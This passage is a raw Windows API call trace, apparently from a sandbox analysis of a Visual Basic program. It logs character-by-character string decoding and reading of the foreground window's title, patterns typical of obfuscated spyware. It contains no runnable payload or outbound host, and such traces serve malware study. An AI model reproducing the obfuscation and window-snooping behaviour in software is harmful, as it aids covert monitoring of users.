CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=2, lpMultiByteStr=0xe57084, cbMultiByte=3, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 2 [0086.344] SetWindowTextA (hWnd=0x2036e, lpString="") returned 1 [0086.345] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0086.345] GetFocus () returned 0x0 [0086.345] lstrlenA (lpString="") returned 0 [0086.345] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xc, wParam=0x0, lParam=0xe57084) returned 0x1 [0086.345] IsWindow (hWnd=0x2036e) returned 1 [0086.345] IsWindow (hWnd=0x2036e) returned 1 [0086.345] IsWindow (hWnd=0x2036e) returned 1 [0086.345] IsWindow (hWnd=0x2036e) returned 1 [0086.346] GetFocus () returned 0x0 [0086.346] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0 [0086.346] GetFocus () returned 0x0 [0086.346] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x1) returned 0x310bcd0 [0086.346] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xd, wParam=0x1, lParam=0x310bcd0) returned 0x0 [0086.346] GetFocus () returned 0x0 [0086.347] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310bcd0 | out: hHeap=0x30f0000) returned 1 [0086.347] VarCmp (pvarLeft=0x28f180, pvarRight=0x28f1e8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0086.347] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`", lpUsedDefaultChar=0x0) returned 1 [0086.348] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.348] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0086.348] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.348] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u", lpUsedDefaultChar=0x0) returned 1 [0086.348] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.348] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0086.348] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.349] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0086.349] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.349] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0086.349] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.350] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84", lpUsedDefaultChar=0x0) returned 1 [0086.350] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.350] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0xe57084, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0086.350] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.351] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0086.351] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.351] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0086.351] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.351] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u", lpUsedDefaultChar=0x0) returned 1 [0086.351] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.351] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0086.352] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.352] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82", lpUsedDefaultChar=0x0) returned 1 [0086.352] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.352] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0086.352] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0086.353] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.353] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0086.353] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.353] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q", lpUsedDefaultChar=0x0) returned 1 [0086.353] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.354] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0086.354] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.354] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0086.354] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.354] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0086.354] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.355] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84", lpUsedDefaultChar=0x0) returned 1 [0086.355] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.355] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0086.355] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.355] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{", lpUsedDefaultChar=0x0) returned 1 [0086.356] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.356] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0086.356] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.356] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.356] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.356] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.356] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.357] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0086.357] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.357] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0086.357] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.358] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y", lpUsedDefaultChar=0x0) returned 1 [0086.358] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.358] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0086.358] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.358] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.358] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.359] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.359] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0086.359] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0086.359] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.360] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s", lpUsedDefaultChar=0x0) returned 1 [0086.360] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.360] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0086.360] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.360] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.361] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.361] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.361] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":", lpUsedDefaultChar=0x0) returned 1 [0086.361] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.361] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0086.361] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0086.362] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.362] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0086.362] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0086.363] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.363] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0086.363] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.363] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0086.363] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.363] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe570fc, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0086.364] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=", lpUsedDefaultChar=0x0) returned 1 [0086.364] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.364] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0086.364] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.364] GetForegroundWindow () returned 0x102c2 [0086.365] GetLastError () returned 0x0 [0086.365] SysStringLen (param_1=" ") returned 0xff [0086.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0086.365] SysStringLen (param_1=" ") returned 0xff [0086.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0xe577bc, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0086.365] GetWindowTextA (in: hWnd=0x102c2, lpString=0xe577bc, nMaxCount=255 | out: lpString="Activity Arrive Event") returned 21 [0086.365] GetLastError () returned 0x0 [0086.365] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0086.365] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0086.365] SysStringByteLen (bstr="捁楴楶祴䄠牲癩⁥癅湥t†††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0086.366] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Activity Arrive Event", cbMultiByte=256, lpWideCharStr=0xe3bb3c, cchWideChar=511 | out: lpWideCharStr="Activity Arrive Event") returned 256 [0086.366] SysStringLen (param_1="Acti") returned 0x4 [0086.366] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Acti", cchWideChar=5, lpMultiByteStr=0xe4a94c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Acti", lpUsedDefaultChar=0x0) returned 5 [0086.366] SetWindowTextA (hWnd=0x2036e, lpString="Acti") returned 1 [0086.366] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x0 [0086.366] GetFocus () returned 0x0 [0086.366] lstrlenA (lpString="Acti") returned 4 [0086.366] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xc, wParam=0x0, lParam=0xe4a94c) returned 0x1 [0086.367] IsWindow (hWnd=0x2036e) returned 1 [0086.367] IsWindow (hWnd=0x2036e) returned 1 [0086.367] IsWindow (hWnd=0x2036e) returned 1 [0086.367] IsWindow (hWnd=0x2036e) returned 1 [0086.368] GetFocus () returned 0x0 [0086.368] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x4 [0086.368] GetFocus () returned 0x0 [0086.368] RtlAllocateHeap (HeapHandle=0x30f0000, Flags=0x0, Size=0x5) returned 0x310bcd0 [0086.368] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x2036e, Msg=0xd, wParam=0x5, lParam=0x310bcd0) returned 0x4 [0086.368] GetFocus () returned 0x0 [0086.368] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Acti", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0086.368] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Acti", cbMultiByte=-1, lpWideCharStr=0xe4a94c, cchWideChar=5 | out: lpWideCharStr="Acti") returned 5 [0086.368] HeapFree (in: hHeap=0x30f0000, dwFlags=0x0, lpMem=0x310bcd0 | out: hHeap=0x30f0000) returned 1 [0086.368] VarCmp (pvarLeft=0x28f180, pvarRight=0x28f1e8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0086.369] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`", lpUsedDefaultChar=0x0) returned 1 [0086.370] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.370] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0086.370] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.370] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="†", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x86", lpUsedDefaultChar=0x0) returned 1 [0086.370] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.370] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="y", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="y") returned 1 [0086.370] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0086.371] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.371] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe5705c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0086.371] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.371] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0086.372] VarSub (in: pvarLeft=0x28f1c8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.372] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0086.372] VarCat (in: pvarLeft=0x28f1e8, pvarRight=0x28f1a0, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.372] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0086.373] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.373] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe57124, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0086.373] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f208, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0b6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u", lpUsedDefaultChar=0x0) returned 1 [0086.373] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f150, pvarResult=0x28f180 | out: pvarResult=0x28f180) returned 0x0 [0086.373] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, 